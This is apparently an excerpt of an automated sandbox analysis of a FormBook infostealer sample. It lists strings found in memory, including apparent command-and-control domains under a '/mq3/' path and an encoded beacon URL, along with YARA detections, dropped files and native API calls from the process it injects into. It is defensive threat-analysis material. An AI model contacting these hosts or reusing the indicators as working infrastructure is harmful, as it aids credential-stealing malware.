78 74 2f 63 73 73 22 3e 0a 09 09 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 50 72 6f 78 69 6d 61 20 4e 6f 76 61 27 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 22 29 3b 0a 09 09 09 73 72 63 3a 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73 69 74 65 2e 63 6f 6d 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2f 75 69 2d 66 72 61 6d 65 77 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 65 6f 74 3f 23 69 65 66 69 78 22 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000005.00000000.560432526.0000000002630000.00000004.00000001.sdmpString found in binary or memory: http://ns.adob1
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.3dcellmodelscongress.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.3dcellmodelscongress.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.3dcellmodelscongress.com/mq3/www.tams.rocks
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.3dcellmodelscongress.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.aaronnational.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.aaronnational.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.aaronnational.com/mq3/www.askcopdtreatmentok.live
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.aaronnational.comReferer:
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.askcopdtreatmentok.live
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.askcopdtreatmentok.live/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.askcopdtreatmentok.live/mq3/www.snagabag31.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.askcopdtreatmentok.liveReferer:
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.greenerpharms.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.greenerpharms.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.greenerpharms.com/mq3/www.sj233.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.greenerpharms.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1162864887.0000000003A79000.00000004.00000001.sdmpString found in binary or memory: http://www.hugoph.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmp, NETSTAT.EXE, 00000006.00000002.1162864887.0000000003A79000.00000004.00000001.sdmpString found in binary or memory: http://www.hugoph.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.hugoph.com/mq3/www.xn--3bst11cpvj0o2a.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.hugoph.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.icbjesusdenazaret.net
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.icbjesusdenazaret.net/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.icbjesusdenazaret.net/mq3/www.porcber.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.icbjesusdenazaret.netReferer:
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.operatorcloud.net
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.operatorcloud.net/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.operatorcloud.net/mq3/www.aaronnational.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.operatorcloud.netReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.com/mq3/www.hugoph.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.porcber.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.r-ev-ival.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.r-ev-ival.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.r-ev-ival.com/mq3/www.operatorcloud.net
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.r-ev-ival.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.rolex218238.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.rolex218238.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.rolex218238.com/mq3/www.greenerpharms.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.rolex218238.comReferer:
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.sj233.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.sj233.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.sj233.com/mq3/www.wwwx36599.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.sj233.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.snagabag31.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.snagabag31.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.snagabag31.com/mq3/www.3dcellmodelscongress.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.snagabag31.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.tams.rocks
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.tams.rocks/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.tams.rocks/mq3/www.yoxi.ltd
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.tams.rocksReferer:
          Source: ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwx36599.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwx36599.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwx36599.com/mq3/S
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.wwwx36599.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--3bst11cpvj0o2a.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--3bst11cpvj0o2a.com/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--3bst11cpvj0o2a.com/mq3/www.r-ev-ival.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.xn--3bst11cpvj0o2a.comReferer:
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.yoxi.ltd
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.yoxi.ltd/mq3/
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.yoxi.ltd/mq3/www.rolex218238.com
          Source: explorer.exe, 00000005.00000003.1087907474.0000000009D0A000.00000004.00000001.sdmpString found in binary or memory: http://www.yoxi.ltdReferer:
          Source: Scan_06032020.exe, 00000000.00000002.563969499.0000000008F92000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.582482765.000000000B276000.00000002.00000001.sdmp, ufipp6ljxlz.exe, 00000010.00000002.886278491.0000000008616000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: ufipp6ljxlz.exe, 00000010.00000002.880761472.0000000003210000.00000004.00000001.sdmpString found in binary or memory: https://github.com/KamilBest/2048Game
          Source: NETSTAT.EXE, 00000006.00000002.1159788515.0000000002E38000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?hl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=190
          Source: NETSTAT.EXE, 00000006.00000002.1163098006.0000000003D6F000.00000004.00000001.sdmpString found in binary or memory: https://www.hugoph.com/mq3/?1bxh=3fSHFPhPtFX80vu0&qFNHgHIH=KqoVQGmIJAwVdvnbXHFhC3/cGIUPqT0Z2GEszuVtR

          Source: Scan_06032020.exe, 00000000.00000002.556283565.0000000000DD0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\N629P6-6\N62logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\N629P6-6\N62logrf.iniJump to dropped file
          Source: C:\Windows\SysWOW64\NETSTAT.EXEDropped file: C:\Users\user\AppData\Roaming\N629P6-6\N62logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.893109948.0000000000EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.882570238.0000000004AEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.604818443.0000000001460000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1159857332.0000000002E60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.558930048.00000000043CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.891510039.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.895810906.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1157158132.0000000000AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.604415201.00000000013D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.603513720.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.893009636.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Scan_06032020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.ufipp6ljxlz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.ufipp6ljxlz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Scan_06032020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00419830 NtCreateFile,
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_004198E0 NtReadFile,
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00419960 NtClose,
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_00419A10 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_0041982A NtCreateFile,
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_004198DA NtReadFile,
          Source: C:\Users\user\Desktop\Scan_06032020.exeCode function: 4_2_0041995B NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A350 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A360 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A310 NtEnumerateValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A3D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A3E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A240 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A260 NtWriteFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A2D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A800 NtSetValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A750 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A610 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A6A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A540 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A560 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A470 NtSetInformationFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A410 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343ACE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A480 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A370 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A220 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343BA30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A2F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343B0B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A700 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A710 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A720 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A780 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A650 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A6D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343BD40 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A520 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A5F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A5A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A460 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343B470 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343B410 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A430 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0343A4A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E79A10 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E798E0 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E79830 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E79960 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E798DA NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E7982A NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_02E7995B NtClose,
